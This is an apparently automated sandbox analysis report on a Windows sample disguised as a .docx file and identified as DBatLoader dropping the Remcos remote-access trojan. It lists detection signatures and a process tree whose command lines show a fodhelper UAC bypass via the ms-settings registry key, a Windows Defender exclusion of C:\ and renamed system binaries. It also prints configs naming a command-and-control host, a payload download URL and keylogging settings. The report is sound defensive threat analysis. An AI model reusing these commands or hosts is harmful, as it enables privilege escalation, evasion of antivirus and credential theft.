Windows Analysis Report
#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Overview

General Information

Sample name: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
renamed because original name is a hash value
Original sample name: -202471.docx.pif.exe
Analysis ID: 1466663
MD5: b9da5a47e1e68ef90c075dc14f8e2037
SHA1: 4ae96232817bf7b3919aa298efc7c0d18649ed9d
SHA256: 8dbccd1c7bdb8da3a34c2a4ac5c62fb6774ce2abac29caf899039d19a5d27555
Tags: exe, pif

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: TrustedPath UAC Bypass Pattern
UAC bypass detected (Fodhelper)
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Creation with Colorcpl
Uses an obfuscated file name to hide its real file extension (double extension)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Reg Add Open Command
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe (PID: 4220 cmdline: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe" MD5: B9DA5A47E1E68EF90C075DC14F8E2037)
    • drbdmeyP.pif (PID: 2796 cmdline: C:\Users\Public\Libraries\drbdmeyP.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • cmd.exe (PID: 3960 cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • extrac32.exe (PID: 1356 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 5884 cmdline: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 5428 cmdline: C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • alpha.exe (PID: 6160 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • extrac32.exe (PID: 7024 cmdline: extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 5856 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • extrac32.exe (PID: 1264 cmdline: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 3180 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • extrac32.exe (PID: 6516 cmdline: extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" MD5: 41330D97BF17D07CD4308264F3032547)
        • alpha.exe (PID: 1648 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • xkn.exe (PID: 4340 cmdline: C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " MD5: 04029E121A0CFA5991749937DD22A1D9)
            • alpha.exe (PID: 7368 cmdline: "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • ger.exe (PID: 7400 cmdline: C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • per.exe (PID: 8080 cmdline: "C:\\Windows \\System32\\per.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
        • alpha.exe (PID: 1652 cmdline: C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • taskkill.exe (PID: 7268 cmdline: taskkill /F /IM SystemSettings.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • alpha.exe (PID: 8188 cmdline: C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • extrac32.exe (PID: 7608 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • colorcpl.exe (PID: 7688 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • SystemSettingsAdminFlows.exe (PID: 7336 cmdline: "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper MD5: 5FA3EEF00388ED6344B4C35BA7CAA460)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

DBatLoader configuration: {"Download Url": ["https://wcmanagers.com/Er9/233_Pyemdbrdpps"]}
Remcos configuration: {"Host:Port:Password": "www.vipguyclassproject2024.space:2404:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-5MRRQ3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\ProgramData\gaban\logs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_DBatLoader | Description: Yara detected DBatLoader | Author: Joe Security
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6656c:$str_b2: Executing file:
  • 0x675ec:$str_b3: GetDirectListeningPort
  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67118:$str_b7: \update.vbs
  • 0x66594:$str_b9: Downloaded file:
  • 0x66580:$str_b10: Downloading file:
  • 0x66624:$str_b12: Failed to upload file:
  • 0x675b4:$str_b13: StartForward
  • 0x675d4:$str_b14: StopForward
  • 0x67070:$str_b15: fso.DeleteFile "
  • 0x67004:$str_b16: On Error Resume Next
  • 0x670a0:$str_b17: fso.DeleteFolder "
  • 0x66614:$str_b18: Uploaded file:
  • 0x665d4:$str_b19: Unable to delete:
  • 0x67038:$str_b20: while fso.FileExists("
  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6656c:$str_b2: Executing file:
  • 0x675ec:$str_b3: GetDirectListeningPort
  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67118:$str_b7: \update.vbs
  • 0x66594:$str_b9: Downloaded file:
  • 0x66580:$str_b10: Downloading file:
  • 0x66624:$str_b12: Failed to upload file:
  • 0x675b4:$str_b13: StartForward
  • 0x675d4:$str_b14: StopForward
  • 0x67070:$str_b15: fso.DeleteFile "
  • 0x67004:$str_b16: On Error Resume Next
  • 0x670a0:$str_b17: fso.DeleteFolder "
  • 0x66614:$str_b18: Uploaded file:
  • 0x665d4:$str_b19: Unable to delete:
  • 0x67038:$str_b20: while fso.FileExists("
  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
  • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6637c:$s1: CoGetObject
  • 0x66390:$s1: CoGetObject
  • 0x663ac:$s1: CoGetObject
  • 0x70338:$s1: CoGetObject
  • 0x6633c:$s2: Elevation:Administrator!new:

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\\Windows \\System32\\per.exe" , CommandLine: "C:\\Windows \\System32\\per.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\per.exe, NewProcessName: C:\Windows \System32\per.exe, OriginalFileName: C:\Windows \System32\per.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3960, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\\Windows \\System32\\per.exe" , ProcessId: 8080, ProcessName: per.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Libraries\drbdmeyP.pif, CommandLine: C:\Users\Public\Libraries\drbdmeyP.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\drbdmeyP.pif, NewProcessName: C:\Users\Public\Libraries\drbdmeyP.pif, OriginalFileName: C:\Users\Public\Libraries\drbdmeyP.pif, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, ParentProcessId: 4220, ParentProcessName: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, ProcessCommandLine: C:\Users\Public\Libraries\drbdmeyP.pif, ProcessId: 2796, ProcessName: drbdmeyP.pif
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Pyemdbrd.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, ProcessId: 4220, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Pyemdbrd
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , CommandLine: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 5856, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" , ProcessId: 1264, ProcessName: extrac32.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3960, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 1648, ProcessName: alpha.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7688, TargetFilename: C:\ProgramData\gaban
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Pyemdbrd.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, ProcessId: 4220, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Pyemdbrd
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\drbdmeyP.pif, CommandLine: C:\Users\Public\Libraries\drbdmeyP.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\drbdmeyP.pif, NewProcessName: C:\Users\Public\Libraries\drbdmeyP.pif, OriginalFileName: C:\Users\Public\Libraries\drbdmeyP.pif, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, ParentProcessId: 4220, ParentProcessName: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, ProcessCommandLine: C:\Users\Public\Libraries\drbdmeyP.pif, ProcessId: 2796, ProcessName: drbdmeyP.pif
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\Public\xkn.exe, ProcessId: 4340, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txw30cbq.i2f.ps1
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3960, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 1648, ProcessName: alpha.exe
Source: Process started | Author: frack113 | Data: Command: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3960, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " , ProcessId: 1648, ProcessName: alpha.exe

Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: 3A 22 D7 FF B5 88 35 F7 AA 82 64 02 49 D7 0F 80 19 35 91 19 F2 25 D3 D7 95 75 B1 85 AF 26 E7 F7 95 39 8F 07 14 53 A4 AA 8E C1 BA 48 58 08 D9 D0 5A 99 34 0A 45 06 44 72 48 5F 36 51 EF 6D E4 7F 1D 69 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7688, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-5MRRQ3\exepath
No Snort rule has matched

AV Detection

Source: www.vipguyclassproject2024.space | Avira URL Cloud: Label: malware
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://wcmanagers.com/Er9/233_Pyemdbrdpps"]}
Source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "www.vipguyclassproject2024.space:2404:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-5MRRQ3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\Public\Libraries\Pyemdbrd.PIF | ReversingLabs: Detection: 44%
Source: C:\Users\Public\Libraries\Pyemdbrd.PIF | Virustotal: Detection: 50%
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | ReversingLabs: Detection: 44%
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Virustotal: Detection: 50%
Source: Yara match | File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
